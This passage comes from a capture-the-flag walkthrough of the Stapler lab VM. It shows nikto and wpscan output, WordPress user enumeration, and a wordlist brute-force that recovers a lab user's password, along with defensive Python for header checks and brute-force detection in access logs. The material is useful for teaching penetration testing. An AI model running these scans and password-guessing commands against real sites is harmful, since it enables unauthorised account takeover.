<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">32</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">33</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">END_TIME: Mon Jun 27 10:57:02 2016</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">34</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">DOWNLOADED: 4612 - FOUND: 2</td></tr>
</tbody></table>
We can see that it initially finds 2 files: .bashrc and .profile.<br />
Looking quickly, I didn't find anything of earth-shattering awesome sauce in either, so I moved on to 12380. Note that nikto gave up on port 80 after hitting its error limit, so that scan is incomplete.<br />
Command: nikto -host 192.168.153.142 -port 12380<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142 -port 12380;</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">- Nikto v2.1.6</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target IP: 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target Hostname: 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target Port: 12380</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?<br />
/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Ciphers: ECDHE-RSA-AES256-GCM-SHA384</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?<br />
/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Start Time: 2016-06-27 11:01:00 (GMT-4)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Server: Apache/2.4.18 (Ubuntu)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The anti-clickjacking X-Frame-Options header is not present.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ No CGI Directories found (use '-C all' to force check all possible dirs)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ "robots.txt" contains 2 entries which should be manually viewed.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">23</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Hostname '192.168.153.142' does not match certificate's names: Red.Initech</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">24</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">25</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Uncommon header 'x-ob_mode' found, with contents: 1</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">26</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ OSVDB-3233: /icons/README: Apache default file found.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">27</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ /phpmyadmin/: phpMyAdmin directory found</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">28</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">29</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ End Time: 2016-06-27 11:02:40 (GMT-4) (100 seconds)</td></tr>
</tbody></table>
<br />
So we are getting an SSL cert, and from its subject we get another user: pam.<br />
nikto also flags an uncommon 'dave' response header (dave is already on our list) and a phpMyAdmin directory, and robots.txt gives us 2 folders:<br />
admin112233<br />
blogblog (potentially a CMS) nice.<br />
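As an added example (my code, not the original post's or nikto's), here is how the interesting part of that nikto output can be re-derived from a single captured response plus robots.txt, without sending 7690 requests: the missing security headers, the non-standard headers (nikto's "Uncommon header" heuristic, which is what surfaced dave and x-ob_mode), the Apache ETag whose hex fields expose file metadata, and the robots.txt entries that answer with something other than a denial or redirect. The response and robots.txt are constructed to mirror what nikto reported above, and the fetch function is injected so the robots check runs offline; against a real host you would pass a function that performs the request.<br />

```python
"""Added example, not from the original post: re-derive the notable nikto
findings on :12380 from one captured response plus robots.txt. Inputs are
constructed to mirror what nikto reported; fetch() is injected for offline use."""
import re
from datetime import datetime, timezone
from typing import Callable, Optional

SECURITY_HEADERS = {
    "x-frame-options": "anti-clickjacking X-Frame-Options header is not present",
    "x-content-type-options": "X-Content-Type-Options not set (MIME sniffing allowed)",
    "strict-transport-security": "HTTPS service without Strict-Transport-Security",
}
# What a stock Apache/PHP reply carries; anything else is "uncommon", the same
# heuristic that surfaced the 'dave' and 'x-ob_mode' headers in the scan above.
COMMON_HEADERS = {
    "date", "server", "last-modified", "etag", "accept-ranges", "content-length",
    "vary", "connection", "content-type", "keep-alive", "cache-control", "expires",
    "pragma", "set-cookie", "x-powered-by", "transfer-encoding", "link",
    "content-security-policy", "x-xss-protection",
}
# Apache FileETag: dash-separated hex fields (inode, size, mtime, as configured).
APACHE_ETAG = re.compile(r'^(?:W/)?"([0-9a-f]+(?:-[0-9a-f]+)+)"$')

def parse_response(raw: bytes) -> tuple:
    """Split a raw HTTP response into (status code, lowercased header dict)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status_line, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(status_line.split()[1]), headers

def header_findings(headers: dict, https: bool) -> list:
    """The header-hygiene checks from the scan above, run over one response."""
    found = []
    for name, message in SECURITY_HEADERS.items():
        if name == "strict-transport-security" and not https:
            continue  # HSTS only means something on an HTTPS service
        if name not in headers:
            found.append(message)
    for name in sorted(headers):
        if name not in COMMON_HEADERS and name not in SECURITY_HEADERS:
            found.append(f"uncommon header '{name}' with contents: {headers[name]}")
    match = APACHE_ETAG.match(headers.get("etag", ""))
    if match:
        fields = [int(x, 16) for x in match.group(1).split("-")]
        found.append("ETag leaks file metadata, fields: " + " ".join(map(hex, fields)))
    return found

def etag_mtime(etag: str) -> Optional[datetime]:
    """Apache puts the mtime last, as microseconds since the epoch."""
    match = APACHE_ETAG.match(etag)
    if not match:
        return None
    usec = int(match.group(1).split("-")[-1], 16)
    return datetime.fromtimestamp(usec / 1_000_000, tz=timezone.utc)

def robots_paths(robots_txt: str) -> list:
    """Every Disallow/Allow path: the operator's own list of what not to miss."""
    paths = []
    for line in robots_txt.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() in ("disallow", "allow") and value.strip():
            paths.append(value.strip())
    return paths

def robots_findings(robots_txt: str, fetch: Callable[[str], int]) -> list:
    """fetch(path) returns a status code; anything not denied or redirected is reachable."""
    out = []
    for path in robots_paths(robots_txt):
        code = fetch(path)
        if code not in (401, 403) and not 300 <= code < 400:
            out.append(f"robots.txt entry '{path}' returned {code}")
    return out

# Constructed response mirroring the headers nikto reported for the :12380 root.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 27 Jun 2016 15:01:00 GMT\r\n"
    b"Server: Apache/2.4.18 (Ubuntu)\r\n"
    b'ETag: "15-5347c53a972d1"\r\n'
    b"Accept-Ranges: bytes\r\n"
    b"Content-Length: 21\r\n"
    b"Dave: Soemthing doesn't look right here\r\n"
    b"X-OB_Mode: 1\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html>...</html>"
)
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /admin112233/\nDisallow: /blogblog/\n"

if __name__ == "__main__":
    status, headers = parse_response(SAMPLE_RESPONSE)
    for line in header_findings(headers, https=True):
        print("+", line)
    print("+ ETag mtime:", etag_mtime(headers["etag"]))
    for line in robots_findings(SAMPLE_ROBOTS, fetch=lambda path: 200):
        print("+", line)
```

The ETag decode is the part worth remembering: Apache's default FileETag on 2.4 is MTime and Size, so the 0x15 above is the file size (21 bytes) and the long field is the modification time in microseconds, which dates the file to June 2016; older configurations also include the inode, which is what nikto's message is really warning about.<br />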
Navigating to https://192.168.153.142:12380/admin112233 gives us the following (did you get caught? :) )<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI078b2mnLZUeVwUUACDIzbuQPsLHx8pj_oEkvJ0KL3N4gBFJM1QKWTpKtXddE_-NsBlS0UPNhh004WzCPt74Fdxfn2TNArbnvfrbcu9-GMWqxCHK8bePoW_bO4o7IbCSnlsqNvDk2rIk/s1600/112233.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI078b2mnLZUeVwUUACDIzbuQPsLHx8pj_oEkvJ0KL3N4gBFJM1QKWTpKtXddE_-NsBlS0UPNhh004WzCPt74Fdxfn2TNArbnvfrbcu9-GMWqxCHK8bePoW_bO4o7IbCSnlsqNvDk2rIk/s640/112233.bmp" width="640" /></a></div>
<br />
Moving on...<br />
<br />
blogblog reveals itself as a WordPress site. Sweet. If we get a credential, hopefully we can edit a theme and drop a reverse shell or otherwise get RCE.<br />
<br />
For this next part I am going to use <b>wpscan</b> to find everything of value (if you are looking for another awesome tutorial, a video one, check out <a href="https://7ms.us/">https://7ms.us</a>; Brian does a great job of explaining which flags to use for wpscan. Thanks Brian <a href="http://twitter.com/@7minsec">@7minsec</a>)<br />
<br />
Command: wpscan --url https://192.168.153.142:12380/blogblog/ -e u[1-20] -e a<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">_______________________________________________________________</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">__ _______ _____</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">\ \ / / __ \ / ____|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">\ \ /\ / /| |__) | (___ ___ __ _ _ __</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">\ /\ / | | ____) | (__| (_| | | | |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">\/ \/ |_| |_____/ \___|\__,_|_| |_|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">WordPress Security Scanner by the WPScan Team</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Version 2.9.1</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Sponsored by Sucuri - https://sucuri.net</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">_______________________________________________________________</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] URL: https://192.168.153.142:12380/blogblog/</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Started: Mon Jun 27 11:17:31 2016</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[!] The WordPress 'https://192.168.153.142:12380/blogblog/readme.html' file exists exposing a version number</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Interesting header: DAVE: Soemthing doesn't look right here</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[!] Registration is enabled: https://192.168.153.142:12380/blogblog/wp-login.php?action=register</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] XML-RPC Interface available under: https://192.168.153.142:12380/blogblog/xmlrpc.php</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[!] Upload directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-content/uploads/</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[!] Includes directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-includes/</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[!] 21 vulnerabilities identified from the version number</td></tr>
</tbody></table>
So we know that it is running version 4.2.1, with 21 vulnerabilities matched from that version number alone...nice... But I want to see what (if any) users could be found.
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Enumerating usernames ...</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Identified the following 16 user/s:</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+---------+-----------------+</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| Id | Login | Name |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+---------+-----------------+</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 1 | john | John Smith |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 2 | elly | Elly Jones |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 3 | peter | Peter Parker |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 4 | barry | Barry Atkins |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 5 | heather | Heather Neville |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 6 | garry | garry |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 7 | harry | harry |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 8 | scott | scott |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 9 | kathy | kathy |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 10 | tim | tim |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 11 | zoe | ZOE |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 12 | dave | Dave |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 13 | simon | Simon |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 14 | abby | Abby |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 15 | vicki | Vicki |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| 16 | pam | Pam |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+---------+-----------------+</td></tr>
</tbody></table>
Damn.... That's a lot of users, some of which look pretty familiar:<br />
<span style="font-family: inherit;"><span style="font-size: small;">pam</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">dave</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">zoe</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">tim</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">garry</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">harry</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">barry</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">peter</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">john</span></span><br />
<span style="font-family: inherit;"><span style="font-size: small;">elly</span></span><br />
<br />
I remember seeing a message for elly stating that there was a payload waiting for her in her FTP account... or something like that. Let's see if wpscan can brute-force her password.<br />
Command: wpscan --url https://192.168.153.142:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou_5max.txt --username elly<br />
<br />
<b>****NOTE: rockyou_5max.txt is just the rockyou list, reduced to the words that are 5 characters or less****</b><br />
<b>****NOTE v2.0: I also created a brute-forcer in Python for finding the password; as a codemonkey I feel the need to always try it on my own. If anyone wants it, feel free to leave a comment and I can share it with you****</b><br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Enumerating plugins from passive detection ...</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] No plugins found</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Starting the password brute forcer</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] [SUCCESS] Login : elly Password : ylle</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Brute Forcing 'elly' Time: 00:18:01 </td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+-------+------+----------+</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| Id | Login | Name | Password |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+-------+------+----------+</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">| | elly | | ylle |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+----+-------+------+----------+</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Finished: Mon Jun 27 11:46:55 2016</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Requests Done: 99717</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Memory used: 42.395 MB</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[+] Elapsed time: 00:18:04</td></tr>
</tbody></table>
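That run took 99,717 requests in about 18 minutes against one login, which is the kind of traffic pattern a web server's access log makes easy to spot. The block below is an added example (not code from the original post and not part of wpscan) that parses Apache combined-format access-log lines and flags any client sending more than a threshold of POSTs to wp-login.php or xmlrpc.php inside a sliding time window. The log lines, the client addresses (203.0.113.7 and 10.0.0.5) and the 20-in-60-seconds threshold are all constructed for the example.<br />

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" access-log line, e.g.
# 10.0.0.5 - - [27/Jun/2016:11:28:10 -0400] "GET /blogblog/ HTTP/1.1" 200 9012
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Endpoints a WordPress password-guessing tool posts to.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


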